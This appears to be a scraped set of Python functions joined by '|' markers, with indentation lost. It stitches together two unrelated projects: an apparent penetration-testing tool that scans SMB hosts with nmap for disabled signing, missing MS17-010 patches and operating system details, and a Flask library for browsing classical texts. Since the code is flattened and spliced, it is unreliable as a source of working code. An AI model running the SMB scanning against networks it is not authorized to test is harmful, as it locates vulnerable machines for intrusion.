print_notification("Completed, 'smb_signing_disabled' tag added to systems with smb signing disabled, 'MS17-010' tag added to systems that did not apply MS17-010.")
stats = {'smb_signing': smb_signing, 'MS17_010': ms17, 'scanned_services': len(services)}
Logger().log('smb_vulnscan', 'Scanned {} smb services for vulnerabilities'.format(len(services)), stats)
else:
print_notification("No services found to scan.") |
def os_discovery():
"""
    Performs OS (and domain) discovery of SMB hosts.
"""
hs = HostSearch()
hosts = hs.get_hosts(ports=[445], tags=['!nmap_os'])
    # TODO: fix filter for empty fields.
hosts = [host for host in hosts if not host.os]
host_dict = {}
for host in hosts:
host_dict[str(host.address)] = host
arguments = "--script smb-os-discovery.nse -p 445 -Pn -n --disable-arp-ping".split(' ')
if len(hosts):
count = 0
print_notification("Checking OS of {} systems".format(len(hosts)))
result = nmap(arguments, [str(h.address) for h in hosts])
parser = NmapParser()
report = parser.parse_fromstring(result)
for nmap_host in report.hosts:
for script_result in nmap_host.scripts_results:
script_result = script_result.get('elements', {})
host = host_dict[str(nmap_host.address)]
if 'fqdn' in script_result:
host.hostname.append(script_result['fqdn'])
if 'os' in script_result:
count += 1
host.os = script_result['os']
host_dict[str(nmap_host.address)] = host
for host in hosts:
host.add_tag('nmap_os')
host.save()
print_notification("Done, found the os of {} systems".format(count))
else:
print_notification("No systems found to be checked.") |
def overview():
"""
Function to create an overview of the services.
    Will print a list of the ports found and the number of times each port was seen.
"""
search = Service.search()
search = search.filter("term", state='open')
search.aggs.bucket('port_count', 'terms', field='port', order={'_count': 'desc'}, size=100) \
.metric('unique_count', 'cardinality', field='address')
response = search.execute()
print_line("Port Count")
print_line("---------------")
for entry in response.aggregations.port_count.buckets:
print_line("{0:<7} {1}".format(entry.key, entry.unique_count.value)) |
def _plugin_endpoint_rename(fn_name, instance):
""" Rename endpoint function name to avoid conflict when namespacing is set to true
:param fn_name: Name of the route function
:param instance: Instance bound to the function
:return: Name of the new namespaced function name
"""
if instance and instance.namespaced:
fn_name = "r_{0}_{1}".format(instance.name, fn_name[2:])
return fn_name |
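A tiny illustration of the renaming scheme above, using a SimpleNamespace stand-in for a plugin instance:

from types import SimpleNamespace

plugin = SimpleNamespace(namespaced=True, name="myplugin")
print(_plugin_endpoint_rename("r_collection", plugin))  # -> r_myplugin_collection
print(_plugin_endpoint_rename("r_collection", None))    # unchanged when no instance is given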
def get_locale(self):
""" Retrieve the best matching locale using request headers
    .. note:: Probably one of the things to enhance quickly.
:rtype: str
"""
best_match = request.accept_languages.best_match(['de', 'fr', 'en', 'la'])
if best_match is None:
if len(request.accept_languages) > 0:
best_match = request.accept_languages[0][0][:2]
else:
return self.__default_lang__
lang = self.__default_lang__
if best_match == "de":
lang = "ger"
elif best_match == "fr":
lang = "fre"
elif best_match == "en":
lang = "eng"
elif best_match == "la":
lang = "lat"
return lang |
def transform(self, work, xml, objectId, subreference=None):
""" Transform input according to potentially registered XSLT
.. note:: Since 1.0.0, transform takes an objectId parameter which represent the passage which is called
    .. note:: Because the XSLT object cannot be reused twice, the stylesheet is rebuilt at every call
.. warning:: Until a C libxslt error is fixed ( https://bugzilla.gnome.org/show_bug.cgi?id=620102 ), \
it is not possible to use strip tags in the xslt given to this application
:param work: Work object containing metadata about the xml
:type work: MyCapytains.resources.inventory.Text
:param xml: XML to transform
:type xml: etree._Element
:param objectId: Object Identifier
:type objectId: str
:param subreference: Subreference
:type subreference: str
:return: String representation of transformed resource
:rtype: str
"""
    # Check first whether a transformation is registered for this specific object
if str(objectId) in self._transform:
func = self._transform[str(objectId)]
else:
func = self._transform["default"]
# If we have a string, it means we get a XSL filepath
if isinstance(func, str):
with open(func) as f:
xslt = etree.XSLT(etree.parse(f))
return etree.tostring(
xslt(xml),
encoding=str, method="html",
xml_declaration=None, pretty_print=False, with_tail=True, standalone=None
)
# If we have a function, it means we return the result of the function
elif isinstance(func, Callable):
return func(work, xml, objectId, subreference)
# If we have None, it means we just give back the xml
elif func is None:
return etree.tostring(xml, encoding=str) |
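A minimal standalone lxml sketch of the string-path branch above (the stylesheet path and the sample XML are made up):

from lxml import etree

xml = etree.fromstring("<div><l n='1'>Arma virumque cano</l></div>")
with open("path/to/stylesheet.xsl") as f:  # assumed to exist
    xslt = etree.XSLT(etree.parse(f))
html = etree.tostring(xslt(xml), encoding=str, method="html")
print(html)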
def get_inventory(self):
""" Request the api endpoint to retrieve information about the inventory
:return: Main Collection
:rtype: Collection
"""
if self._inventory is not None:
return self._inventory
self._inventory = self.resolver.getMetadata()
return self._inventory |
def get_reffs(self, objectId, subreference=None, collection=None, export_collection=False):
""" Retrieve and transform a list of references.
Returns the inventory collection object with its metadata and a callback function taking a level parameter \
and returning a list of strings.
:param objectId: Collection Identifier
:type objectId: str
:param subreference: Subreference from which to retrieve children
:type subreference: str
:param collection: Collection object bearing metadata
:type collection: Collection
:param export_collection: Return collection metadata
:type export_collection: bool
:return: Returns either the list of references, or the text collection object with its references as tuple
:rtype: (Collection, [str]) or [str]
"""
if collection is not None:
text = collection
else:
text = self.get_collection(objectId)
reffs = self.chunk(
text,
lambda level: self.resolver.getReffs(objectId, level=level, subreference=subreference)
)
if export_collection is True:
return text, reffs
return reffs |
def get_passage(self, objectId, subreference):
""" Retrieve the passage identified by the parameters
:param objectId: Collection Identifier
:type objectId: str
:param subreference: Subreference of the passage
:type subreference: str
:return: An object bearing metadata and its text
:rtype: InteractiveTextualNode
"""
passage = self.resolver.getTextualNode(
textId=objectId,
subreference=subreference,
metadata=True
)
return passage |
def get_siblings(self, objectId, subreference, passage):
""" Get siblings of a browsed subreference
.. note:: Since 1.0.0c, there is no more prevnext dict. Nemo uses the list of original\
chunked references to retrieve next and previous, or simply relies on the resolver to get siblings\
when the subreference is not found in given original chunks.
:param objectId: Id of the object
:param subreference: Subreference of the object
:param passage: Current Passage
:return: Previous and next references
:rtype: (str, str)
"""
reffs = [reff for reff, _ in self.get_reffs(objectId)]
if subreference in reffs:
index = reffs.index(subreference)
# Not the first item and not the last one
if 0 < index < len(reffs) - 1:
return reffs[index-1], reffs[index+1]
elif index == 0 and index < len(reffs) - 1:
return None, reffs[1]
elif index > 0 and index == len(reffs) - 1:
return reffs[index-1], None
else:
return None, None
else:
return passage.siblingsId |
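A small worked example of the sibling lookup above, assuming the chunked references for a text are ["1.1", "1.2", "1.3"]:

reffs = ["1.1", "1.2", "1.3"]

def siblings(subreference):
    # mirrors the index arithmetic above; unknown references fall back to the resolver
    if subreference not in reffs:
        return "fall back to passage.siblingsId"
    index = reffs.index(subreference)
    prev = reffs[index - 1] if index > 0 else None
    next_ = reffs[index + 1] if index < len(reffs) - 1 else None
    return prev, next_

print(siblings("1.1"))  # (None, '1.2')
print(siblings("1.2"))  # ('1.1', '1.3')
print(siblings("1.3"))  # ('1.2', None)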
def semantic(self, collection, parent=None):
""" Generates a SEO friendly string for given collection
:param collection: Collection object to generate string for
:param parent: Current collection parent
:return: SEO/URL Friendly string
"""
if parent is not None:
collections = parent.parents[::-1] + [parent, collection]
else:
collections = collection.parents[::-1] + [collection]
return filters.slugify("--".join([item.get_label() for item in collections if item.get_label()])) |
def make_coins(self, collection, text, subreference="", lang=None):
""" Creates a CoINS Title string from information
:param collection: Collection to create coins from
:param text: Text/Passage object
:param subreference: Subreference
:param lang: Locale information
:return: Coins HTML title value
"""
if lang is None:
lang = self.__default_lang__
return "url_ver=Z39.88-2004"\
"&ctx_ver=Z39.88-2004"\
"&rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook"\
"&rft_id={cid}"\
"&rft.genre=bookitem"\
"&rft.btitle={title}"\
"&rft.edition={edition}"\
"&rft.au={author}"\
"&rft.atitle={pages}"\
"&rft.language={language}"\
"&rft.pages={pages}".format(
title=quote(str(text.get_title(lang))), author=quote(str(text.get_creator(lang))),
cid=url_for(".r_collection", objectId=collection.id, _external=True),
language=collection.lang, pages=quote(subreference), edition=quote(str(text.get_description(lang)))
) |
def expose_ancestors_or_children(self, member, collection, lang=None):
""" Build an ancestor or descendant dict view based on selected information
:param member: Current Member to build for
:param collection: Collection from which we retrieved it
:param lang: Language to express data in
    :return: Dict view of the member with its id, label, model, type, size and semantic slug
"""
x = {
"id": member.id,
"label": str(member.get_label(lang)),
"model": str(member.model),
"type": str(member.type),
"size": member.size,
"semantic": self.semantic(member, parent=collection)
}
if isinstance(member, ResourceCollection):
x["lang"] = str(member.lang)
return x |
def make_members(self, collection, lang=None):
""" Build member list for given collection
:param collection: Collection to build dict view of for its members
:param lang: Language to express data in
:return: List of basic objects
"""
objects = sorted([
self.expose_ancestors_or_children(member, collection, lang=lang)
for member in collection.members
if member.get_label()
],
key=itemgetter("label")
)
return objects |
def make_parents(self, collection, lang=None):
""" Build parents list for given collection
:param collection: Collection to build dict view of for its members
:param lang: Language to express data in
:return: List of basic objects
"""
return [
{
"id": member.id,
"label": str(member.get_label(lang)),
"model": str(member.model),
"type": str(member.type),
"size": member.size
}
for member in collection.parents
if member.get_label()
] |
def r_collections(self, lang=None):
""" Retrieve the top collections of the inventory
:param lang: Lang in which to express main data
:type lang: str
:return: Collections information and template
:rtype: {str: Any}
"""
collection = self.resolver.getMetadata()
return {
"template": "main::collection.html",
"current_label": collection.get_label(lang),
"collections": {
"members": self.make_members(collection, lang=lang)
}
} |
def r_collection(self, objectId, lang=None):
""" Collection content browsing route function
:param objectId: Collection identifier
:type objectId: str
:param lang: Lang in which to express main data
:type lang: str
:return: Template and collections contained in given collection
:rtype: {str: Any}
"""
collection = self.resolver.getMetadata(objectId)
return {
"template": "main::collection.html",
"collections": {
"current": {
"label": str(collection.get_label(lang)),
"id": collection.id,
"model": str(collection.model),
"type": str(collection.type),
},
"members": self.make_members(collection, lang=lang),
"parents": self.make_parents(collection, lang=lang)
},
} |
def r_references(self, objectId, lang=None):
""" Text exemplar references browsing route function
:param objectId: Collection identifier
:type objectId: str
:param lang: Lang in which to express main data
:type lang: str
:return: Template and required information about text with its references
"""
collection, reffs = self.get_reffs(objectId=objectId, export_collection=True)
return {
"template": "main::references.html",
"objectId": objectId,
"citation": collection.citation,
"collections": {
"current": {
"label": collection.get_label(lang),
"id": collection.id,
"model": str(collection.model),
"type": str(collection.type),
},
"parents": self.make_parents(collection, lang=lang)
},
"reffs": reffs
} |
def r_first_passage(self, objectId):
""" Provides a redirect to the first passage of given objectId
:param objectId: Collection identifier
:type objectId: str
:return: Redirection to the first passage of given text
"""
collection, reffs = self.get_reffs(objectId=objectId, export_collection=True)
first, _ = reffs[0]
return redirect(
url_for(".r_passage_semantic", objectId=objectId, subreference=first, semantic=self.semantic(collection))
) |
def r_passage(self, objectId, subreference, lang=None):
""" Retrieve the text of the passage
:param objectId: Collection identifier
:type objectId: str
:param lang: Lang in which to express main data
:type lang: str
:param subreference: Reference identifier
:type subreference: str
:return: Template, collections metadata and Markup object representing the text
:rtype: {str: Any}
"""
collection = self.get_collection(objectId)
if isinstance(collection, CtsWorkMetadata):
editions = [t for t in collection.children.values() if isinstance(t, CtsEditionMetadata)]
if len(editions) == 0:
raise UnknownCollection("This work has no default edition")
return redirect(url_for(".r_passage", objectId=str(editions[0].id), subreference=subreference))
text = self.get_passage(objectId=objectId, subreference=subreference)
passage = self.transform(text, text.export(Mimetypes.PYTHON.ETREE), objectId)
prev, next = self.get_siblings(objectId, subreference, text)
return {
"template": "main::text.html",
"objectId": objectId,
"subreference": subreference,
"collections": {
"current": {
"label": collection.get_label(lang),
"id": collection.id,
"model": str(collection.model),
"type": str(collection.type),
"author": text.get_creator(lang),
"title": text.get_title(lang),
"description": text.get_description(lang),
"citation": collection.citation,
"coins": self.make_coins(collection, text, subreference, lang=lang)
},
"parents": self.make_parents(collection, lang=lang)
},
"text_passage": Markup(passage),
"prev": prev,
"next": next
} |